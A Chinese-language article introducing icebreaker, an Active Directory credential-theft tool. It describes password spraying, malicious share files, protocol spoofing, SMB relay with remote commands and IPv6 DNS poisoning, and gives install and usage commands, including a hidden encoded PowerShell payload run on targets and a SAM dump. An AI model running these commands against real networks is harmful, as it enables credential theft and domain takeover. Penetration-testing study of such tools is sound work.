icebreaker是一款针对活动目录凭证安全的研究工具,在该工具的帮助下,广大研究人员能够在活动目录环境之外(但在内部网络中)获取目标活动目录的明文凭证。
该工具会对目标活动目录以自动化的方式进行五次内部渗透测试,并尝试获取明文凭证。除此之外,我们还可以使用--auto选项来以自动化的形式获取域管理员权限。
1、反向爆破:自动获取用户名列表,并使用两个最常用的活动目录密码测试每个用户名(两次以上的尝试可能会触发帐户锁定策略);
2、上传网络共享:通过将恶意文件上传到可用网络共享来捕获用户的密码;
3、渗透广播网络协议:使用常见的网络协议欺骗用户的计算机向我们发送密码;
4、中间人SMB连接:对活动目录计算机执行远程命令以收集密码;
5、渗透IPv6 DNS:利用DNS欺骗活动目录计算机将其用户密码发送给我们;
广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/DanMcInerney/icebreaker.git
接下来,我们需要以root权限执行下列命令以安装icebreaker:
./setup.sh
pipenv install --three
pipenv shell
如果安装出问题的话,请将pipenv更新到最新版本:
apt-get remove python-pipenv && python setup.py install
我们还可以通过Docker来使用icebreaker,安装命令如下:
docker build --rm -t danmcinerney/icebreaker .
docker run danmcinery/icebreaker
以root权限运行,并从一个IP地址列表(单个IP或CIDR范围)中读取目标:
./icebreaker -l targets.txt -c "powershell -nop -w hidden -exec bypass -enc WwFk..."
从主机列表中读取,告诉Responder使用eth0接口而不是默认网关接口,让Responder运行30m而不是通常的10m,并运行默认的ntlmrelayx命令以将SAM转储到目标服务器:
./icebreaker -l targets.txt -i eth0 -t 30 -c default
使用一个Nmap XML输出文件,跳过所有五次攻击,并为反向爆破使用自定义密码列表:
./icebreaker.py -x nmapscan.xml -s rid,scf,llmnr,relay,dns,crack -p /home/user/password-list.txt
用后即弃方法:
输入目标文件,抓取companydomain.com以获取要添加到反向爆破中的电子邮件用户名,跳过mitm6的IPv6 DNS投毒,并在攻击4开始后在tmux或xterm窗口中运行Empire和DeathStar以获得自动域管理:
./icebreaker.py -l targets.txt -d companydomain.com -s dns --auto [tmux/xterm]
本项目的开发与发布遵循MIT开源许可证协议。
icebreaker:
https://www.powershellempire.com/
https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html
https://github.com/danielmiessler/SecLists/blob/601038eb4ea18c97177b43a757286d3c8a815db8/Passwords/merged.txt.tar.gz
精彩推荐